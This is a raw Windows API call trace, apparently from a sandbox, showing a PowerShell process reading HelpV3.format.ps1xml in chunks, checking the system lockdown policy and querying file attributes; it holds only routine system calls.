	[0044.953] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047670e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047670e20*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.954] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0xe000
	[0044.954] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047670e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047670e20*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.954] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0xf000
	[0044.954] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047670e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047670e20*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.954] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x10000
	[0044.954] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047670e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047670e20*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.955] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x11000
	[0044.955] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047670e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047670e20*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.955] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x12000
	[0044.955] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047670e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047670e20*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.955] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x13000
	[0044.955] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047670e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047670e20*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.956] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x14000
	[0044.956] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047670e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047670e20*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.956] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x15000
	[0044.956] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047670e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047670e20*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.978] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x16000
	[0044.979] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047670e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047670e20*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.979] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x17000
	[0044.979] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047670e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047670e20*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.979] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x18000
	[0044.979] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047670e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047670e20*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.979] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x19000
	[0044.979] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047670e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047670e20*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.980] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x1a000
	[0044.980] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047670e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047670e20*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.980] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x1b000
	[0044.980] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047670e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047670e20*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.980] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x1c000
	[0044.980] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047670e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047670e20*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.981] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x1d000
	[0044.981] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047670e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047670e20*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.981] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x1e000
	[0044.981] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047670e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047670e20*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.981] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x1f000
	[0044.981] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047670e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047670e20*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.982] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x20000
	[0044.982] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047670e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047670e20*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.982] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x21000
	[0044.982] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047670e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047670e20*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.982] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x22000
	[0044.982] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047670e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047670e20*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.983] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x23000
	[0044.983] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047670e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047670e20*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.983] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x24000
	[0044.983] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047670e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047670e20*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.983] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x25000
	[0044.983] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047670e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047670e20*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.984] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x26000
	[0044.984] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047670e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047670e20*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.984] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x27000
	[0044.984] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047670e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047670e20*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.984] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x28000
	[0044.984] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047670e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047670e20*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.985] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x29000
	[0044.985] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047670e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047670e20*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.985] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x2a000
	[0044.985] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047670e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047670e20*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.985] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x2b000
	[0044.985] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047670e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047670e20*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.986] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x2c000
	[0044.986] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047670e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047670e20*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.986] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x2d000
	[0044.986] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047670e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047670e20*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.986] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x2e000
	[0044.986] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047670e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047670e20*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.987] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x2f000
	[0044.987] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047670e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047670e20*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.987] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x30000
	[0044.987] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047670e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047670e20*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.987] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x31000
	[0044.987] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047670e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047670e20*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.988] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x32000
	[0044.988] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047670e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047670e20*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.988] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x33000
	[0044.988] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047670e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047670e20*, lpNumberOfBytesRead=0x184b47cf98*=0xb9a, lpOverlapped=0x0) returned 1
	[0044.988] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x33b9a
	[0044.988] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047670522, nNumberOfBytesToRead=0x66, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047670522*, lpNumberOfBytesRead=0x184b47cf98*=0x0, lpOverlapped=0x0) returned 1
	[0044.988] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x33b9a
	[0044.988] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047670e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047670e20*, lpNumberOfBytesRead=0x184b47cf98*=0x0, lpOverlapped=0x0) returned 1
	[0044.993] CoTaskMemAlloc (cb=0x20c) returned 0x1505f3b6bb0
	[0044.993] GetSystemDirectoryW (in: lpBuffer=0x1505f3b6bb0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0044.993] CoTaskMemFree (pv=0x1505f3b6bb0) 
	[0044.993] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184b47c8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0044.993] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x105, lpBuffer=0x184b47ca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c
	[0044.993] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184b47ceb0) returned 1
	[0044.993] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x184b47cf90 | out: lpFileInformation=0x184b47cf90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13812212, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13812212, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13812212, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x9370)) returned 1
	[0044.993] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184b47ce70) returned 1
	[0044.993] WldpGetLockdownPolicy () returned 0x0
	[0044.993] GetSystemInfo (in: lpSystemInfo=0x184b47cff0 | out: lpSystemInfo=0x184b47cff0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x4f01)) 
	[0044.993] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x184b47cef8 | out: phkResult=0x184b47cef8*=0x5b8) returned 0x0
	[0044.993] RegQueryValueExW (in: hKey=0x5b8, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x184b47cf48, lpData=0x0, lpcbData=0x184b47cf40*=0x0 | out: lpType=0x184b47cf48*=0x0, lpData=0x0, lpcbData=0x184b47cf40*=0x0) returned 0x2
	[0044.993] RegCloseKey (hKey=0x5b8) returned 0x0
	[0044.993] CloseHandle (hObject=0x3d8) returned 1
	[0044.994] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\HelpV3.format.ps1xml", nBufferLength=0x105, lpBuffer=0x184b47ca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\HelpV3.format.ps1xml", lpFilePart=0x0) returned 0x3f
	[0044.994] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184b47cf10) returned 1
	[0044.994] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\HelpV3.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\helpv3.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x150476dc998 | out: lpFileInformation=0x150476dc998*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3880a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3880a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3880a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x33b9a)) returned 1
	[0044.994] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184b47ced0) returned 1
	[0044.994] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\HelpV3.format.ps1xml", nBufferLength=0x105, lpBuffer=0x184b47ca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\HelpV3.format.ps1xml", lpFilePart=0x0) returned 0x3f
	[0044.994] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184b47ce80) returned 1
	[0044.994] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\HelpV3.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\helpv3.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x184b47cf60 | out: lpFileInformation=0x184b47cf60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3880a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3880a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3880a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x33b9a)) returned 1
	[0044.994] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184b47ce40) returned 1
	[0044.994] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\HelpV3.format.ps1xml", nBufferLength=0x105, lpBuffer=0x184b47c9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\HelpV3.format.ps1xml", lpFilePart=0x0) returned 0x3f
	[0044.994] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\HelpV3.format.ps1xml", nBufferLength=0x105, lpBuffer=0x184b47c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\HelpV3.format.ps1xml", lpFilePart=0x0) returned 0x3f
	[0044.994] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\HelpV3.format.ps1xml", nBufferLength=0x105, lpBuffer=0x184b47c920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\HelpV3.format.ps1xml", lpFilePart=0x0) returned 0x3f
	[0044.994] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184b47cd60) returned 1
	[0044.994] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\HelpV3.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\helpv3.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x184b47ce40 | out: lpFileInformation=0x184b47ce40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3880a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3880a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3880a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x33b9a)) returned 1
	[0044.994] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184b47cd20) returned 1
	[0044.994] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\HelpV3.format.ps1xml", nBufferLength=0x105, lpBuffer=0x184b47c810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\HelpV3.format.ps1xml", lpFilePart=0x0) returned 0x3f
	[0044.994] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184b47ccf0) returned 1
